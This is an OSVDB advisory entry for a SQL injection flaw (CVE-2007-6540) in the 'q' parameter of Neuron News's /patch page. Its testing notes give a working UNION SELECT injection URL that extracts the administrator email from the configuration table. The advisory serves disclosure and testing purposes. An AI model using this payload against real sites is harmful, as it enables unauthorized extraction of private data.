Neuron News /patch Default URI q Variable SQL Injection

2007-12-16T00:00:00
ID OSVDB:39988
Type osvdb
Reporter OSVDB
Modified 2007-12-16T00:00:00

Description

Manual Testing Notes

http://[target]/patch/?q='//union//select//1,2,adminmail,4,id//from/*/neuronnews_configuration/

References:

Other Advisory URL: http://securityreason.com/securityalert/3489 CVE-2007-6540